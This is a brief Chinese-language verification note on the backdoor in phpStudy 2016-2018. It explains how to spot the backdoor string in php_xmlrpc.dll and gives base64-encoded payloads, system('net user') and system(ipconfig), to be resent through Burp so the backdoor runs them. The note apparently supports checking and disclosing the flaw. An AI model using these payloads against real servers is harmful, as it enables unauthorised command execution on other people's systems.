phpstudy2016-2018漏洞验证

影响版本

 

 

 

 

漏洞验证

 

 

 

查看目录下 php_xmlrpc.dll

PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll存在@eval(%s('%s'));即说明有后门。

 

 

burp抓包 ctrl+R 重发

 

 

c3lzdGVtKCduZXQgdXNlcicpOw==为system('net user');的base64编码转换

可以通过转码查看

 

 

 

 

c3lzdGVtKCdpcGNvbmZpZycpOw==   system(ipconfig);